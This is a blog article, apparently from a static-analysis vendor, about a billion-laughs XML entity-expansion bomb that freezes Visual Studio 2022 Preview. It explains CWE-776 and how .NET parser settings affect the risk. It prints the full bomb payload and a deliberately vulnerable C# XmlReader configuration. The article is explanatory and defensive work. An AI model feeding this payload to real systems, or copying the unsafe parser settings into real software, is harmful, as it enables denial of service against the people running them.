In April 2021, Microsoft announced a new version of its IDE, Visual Studio 2022, and also announced that the IDE would be 64-bit. We've been waiting for this for so long: no more 4 GB memory limitations! However, as it turned out, it's not all that simple...
By the way, if you missed it, here's a link to the announcement post.
But let's get to the matter in question. I reproduced this problem on the latest (available at the time of writing) Visual Studio 2022 version - 17.0.0 Preview 3.1.
To reproduce this, the following is sufficient:
After this, try to paste the following text into the XML file:
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
<!ENTITY lol10 "&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;">
<!ENTITY lol11
"&lol10;&lol10;&lol10;&lol10;&lol10;&lol10;&lol10;&lol10;&lol10;&lol10;">
<!ENTITY lol12
"&lol11;&lol11;&lol11;&lol11;&lol11;&lol11;&lol11;&lol11;&lol11;&lol11;">
<!ENTITY lol13
"&lol12;&lol12;&lol12;&lol12;&lol12;&lol12;&lol12;&lol12;&lol12;&lol12;">
<!ENTITY lol14
"&lol13;&lol13;&lol13;&lol13;&lol13;&lol13;&lol13;&lol13;&lol13;&lol13;">
<!ENTITY lol15
"&lol14;&lol14;&lol14;&lol14;&lol14;&lol14;&lol14;&lol14;&lol14;&lol14;">
]>
<lolz>&lol15;</lolz>
Now go make yourself a cup of coffee, get back to your computer - and watch Visual Studio eat up more and more RAM.
You may have two questions:
Let's figure this out. To do this, we'll need to understand why processing XML files carelessly can be dangerous and what the PVS-Studio analyzer has to do with all this.
We continue to actively develop PVS-Studio as a SAST solution. For the C# analyzer, the main focus is support for OWASP Top 10 2017 (that's the latest version available - we are looking forward to an update!). By the way, if you missed it, not too long ago we added the taint analysis feature. You can read about it here.
So, I created (or, to be exact, attempted to create) a sample project to test the analyzer. One of the OWASP Top 10 categories we are developing diagnostic rules for is A4:2017-XML External Entities (XXE). It has to do with incorrect XML file processing that makes applications vulnerable to attacks. What does incorrect processing mean? Often it's excessive trust in input data (a perpetual problem that causes many vulnerabilities) combined with XML parsers that lack sufficient limitations.
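As a result, if the files are compromised, this may cause various unpleasant consequences. There are two main problems here: data disclosure and denial of service. Both have corresponding CWEs: CWE-611 (Improper Restriction of XML External Entity Reference) and CWE-776 (Improper Restriction of Recursive Entity References in DTDs).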
I'll leave CWE-611 for another day. Today we need CWE-776.
I'll briefly describe the essence of the problem. If you want to know more, many resources on the internet will provide you with the information you need.
The XML standard allows the use of a DTD (document type definition). A DTD enables you to use so-called XML entities.
The entity syntax is simple:
<!ENTITY myEntity "Entity value">
Then you can get the entity value as follows:
&myEntity;
The catch here is, entities can expand not only into strings (as in our case - "Entity value"), but also into sequences of other entities. For example:
<!ENTITY lol "lol">
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
As a result, when expanding the 'lol1' entity, we get a string that looks like this:
lollollollollollollollollollol
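To check this expansion in code, here is a minimal sketch that parses a harmless one-level document and collects the expanded text. It assumes .NET 5 or later (the sample uses C# top-level statements). The names smallXml, settings and expanded, as well as the cap of 1024 characters, are made up for this illustration and are not part of the original sample.

```csharp
using System;
using System.IO;
using System.Text;
using System.Xml;

// A tiny, harmless document: one level of nesting, ten copies of "lol".
const string smallXml = @"<?xml version=""1.0""?>
<!DOCTYPE lolz [
  <!ENTITY lol ""lol"">
  <!ENTITY lol1 ""&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"">
]>
<lolz>&lol1;</lolz>";

// DTD processing is enabled on purpose, but entity expansion is capped.
// The cap of 1024 characters is an arbitrary value chosen for this sketch.
var settings = new XmlReaderSettings
{
    DtdProcessing = DtdProcessing.Parse,
    MaxCharactersFromEntities = 1024
};

var expanded = new StringBuilder();
using (var reader = XmlReader.Create(new StringReader(smallXml), settings))
{
    while (reader.Read())
    {
        // Collect the text content produced by entity expansion.
        if (reader.NodeType == XmlNodeType.Text)
            expanded.Append(reader.Value);
    }
}

Console.WriteLine(expanded.ToString());
Console.WriteLine(expanded.Length);
```

The reader never hands the '&lol1;' reference to the caller. It returns the already expanded text, which is exactly why deeper nesting becomes a problem.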
You can go further and define the 'lol2' entity by expanding it through 'lol1':
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
Then when expanding the 'lol2' entity, you get the following output:
lollollollollollollollollollollollollollollollollollollollollollollollol
lollollollollollollollollollollollollollollollollollollollollollollollol
lollollollollollollollollollollollollollollollollollollollollollollollol
lollollollollollollollollollollollollollollollollollollollollollollollol
lollollollol
How about going a level deeper and defining the 'lol3' entity?
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
Here's the output you get when expanding it:
lollollollollollollollollollollollollollollollollollollollollollollollol
lollollollollollollollollollollollollollollollollollollollollollollollol
lollollollollollollollollollollollollollollollollollollollollollollollol
lollollollollollollollollollollollollollollollollollollollollollollollol
lollollollollollollollollollollollollollollollollollollollollollollollol
lollollollollollollollollollollollollollollollollollollollollollollollol
lollollollollollollollollollollollollollollollollollollollollollollollol
lollollollollollollollollollollollollollollollollollollollollollollollol
lollollollollollollollollollollollollollollollollollollollollollollollol
lollollollollollollollollollollollollollollollollollollollollollollollol
lollollollollollollollollollollollollollollollollollollollollollollollol
lollollollollollollollollollollollollollollollollollollollollollollollol
lollollollollollollollollollollollollollollollollollollollollollollollol
lollollollollollollollollollollollollollollollollollollollollollollollol
lollollollollollollollollollollollollollollollollollollollollollollollol
lollollollollollollollollollollollollollollollollollollollollollollollol
lollollollollollollollollollollollollollollollollollollollollollollollol
....
The XML file we used at the beginning of the article was generated using the same principle. Now, I think you see where the "billion laughs" name comes from. So, it turns out that if the XML parser is configured incorrectly (DTD processing is enabled and the maximum number of characters from entities is not limited), nothing good happens when this 'bomb' is processed.
In C#, vulnerable code is easiest to demonstrate with the XmlReader type:
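To get a feeling for the scale, the size of the fully expanded text can be estimated with simple arithmetic: every level multiplies the length by ten. Below is a rough sketch of that calculation for the 15-level file from the beginning of the article. The helper ExpandedLength and its parameter names are hypothetical and exist only for this illustration; the code assumes .NET 5 or later (top-level statements).

```csharp
using System;

// The sample document defines lol1 .. lol15; each level references the
// previous entity ten times, and the base entity "lol" is 3 characters long.
const int levels = 15;
const int referencesPerLevel = 10;
const int baseLength = 3;

// Hypothetical helper: length of the fully expanded top-level entity.
static long ExpandedLength(int depth, int factor, int seedLength)
{
    long length = seedLength;
    for (int i = 0; i < depth; i++)
        length = checked(length * factor); // throws on overflow instead of wrapping
    return length;
}

long characters = ExpandedLength(levels, referencesPerLevel, baseLength);

// .NET strings are UTF-16, so each of these characters takes two bytes.
long bytes = checked(characters * 2);

Console.WriteLine("characters: " + characters);
Console.WriteLine("bytes:      " + bytes);
```

For two levels the helper gives 300 characters, which matches the 'lol2' output shown earlier. For fifteen levels the result is 3 * 10^15 characters, so no amount of RAM in a developer machine is going to be enough.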
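using System;
using System.IO;
using System.Xml;

var pathToXmlBomb = @"D:\XMLBomb.xml";
XmlReaderSettings rs = new XmlReaderSettings()
{
    // Deliberately unsafe: DTD processing is enabled...
    DtdProcessing = DtdProcessing.Parse,
    // ...and 0 means no limit on characters that come from entity expansion.
    MaxCharactersFromEntities = 0
};

using var reader = XmlReader.Create(File.OpenRead(pathToXmlBomb), rs);
while (reader.Read())
{
    if (reader.NodeType == XmlNodeType.Text)
        Console.WriteLine(reader.Value);
}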
If I configure my XmlReader this way, I am almost telling the intruder: "Come on, blow this up!".
There are two reasons for this:
By default, DTD processing is prohibited: the DtdProcessing property is set to Prohibit. The maximum number of characters from entities is also limited (starting with .NET Framework 4.5.2). So in modern .NET you have fewer and fewer opportunities to shoot yourself in the foot. This is still possible though, if you configure parsers incorrectly.
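Here is a hedged sketch of how these two settings affect a small, three-level bomb (1000 copies of "lol", so it is safe to run). It assumes .NET 5 or later (top-level statements). The helper TryReadText, the variable names, and the limits of 1,000 and 100,000 characters are all invented for this example; pick limits that fit your own input.

```csharp
using System;
using System.IO;
using System.Text;
using System.Xml;

// A deliberately small bomb: three levels, 10^3 copies of "lol".
const string smallBomb = @"<?xml version=""1.0""?>
<!DOCTYPE lolz [
  <!ENTITY lol ""lol"">
  <!ENTITY lol1 ""&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"">
  <!ENTITY lol2 ""&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;"">
  <!ENTITY lol3 ""&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"">
]>
<lolz>&lol3;</lolz>";

// Hypothetical helper: reads all text nodes and returns false
// if the parser rejects the document with an XmlException.
static bool TryReadText(string xml, XmlReaderSettings settings, out string text)
{
    text = string.Empty;
    try
    {
        var sb = new StringBuilder();
        using var reader = XmlReader.Create(new StringReader(xml), settings);
        while (reader.Read())
        {
            if (reader.NodeType == XmlNodeType.Text)
                sb.Append(reader.Value);
        }
        text = sb.ToString();
        return true;
    }
    catch (XmlException)
    {
        return false;
    }
}

// 1. Default settings: DtdProcessing is Prohibit, so the DOCTYPE is rejected.
var defaults = new XmlReaderSettings();

// 2. DTD allowed, but with a tight cap that this bomb exceeds.
var tightCap = new XmlReaderSettings
{
    DtdProcessing = DtdProcessing.Parse,
    MaxCharactersFromEntities = 1_000
};

// 3. DTD allowed with a cap large enough for this particular document.
var looseCap = new XmlReaderSettings
{
    DtdProcessing = DtdProcessing.Parse,
    MaxCharactersFromEntities = 100_000
};

Console.WriteLine("defaults accepted:  " + TryReadText(smallBomb, defaults, out _));
Console.WriteLine("tight cap accepted: " + TryReadText(smallBomb, tightCap, out _));
Console.WriteLine("loose cap accepted: " + TryReadText(smallBomb, looseCap, out string full));
Console.WriteLine("expanded length:    " + full.Length);
```

If the application does not need DTDs at all, keeping the default Prohibit value is the simplest option. If it does, a finite MaxCharactersFromEntities value turns an out-of-memory situation into an XmlException that can be handled.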
It seems that in Visual Studio 2022, when we copied our XML bomb, both conditions were true:
We examined the process to see what was happening. What we found confirmed our expectations.
The process list showed that the main thread was busy processing the XML file. That caused the GUI to freeze, and the IDE did not respond to any attempts to revive it.
The VS main thread's call stack showed that the thread was busy processing the DTD (the ParseDtd method execution).
During the experiment I was wondering, why does Visual Studio run DTD processing at all? Why doesn't it display XML as-is? I got my answer when experimenting with a small XML bomb (same approach, lighter load).
It seems that the whole point is to display possible values of entities in the editor "on the fly".
Small values are processed successfully, but problems arise when XML entities start growing.
Of course, after my investigation, I had to write a bug report.
This is how we - unexpectedly - saw an XML bomb in action. It was very interesting to explore a real-life popular application and find something like this.
Just as I am writing this, we are developing a diagnostic to search for code that is vulnerable to XML file processing problems. We expect to release it with PVS-Studio 7.15. If you want to see what the analyzer can do right now, I encourage you to download it and try it on your project. ;)
As always, subscribe to my Twitter so as not to miss anything interesting.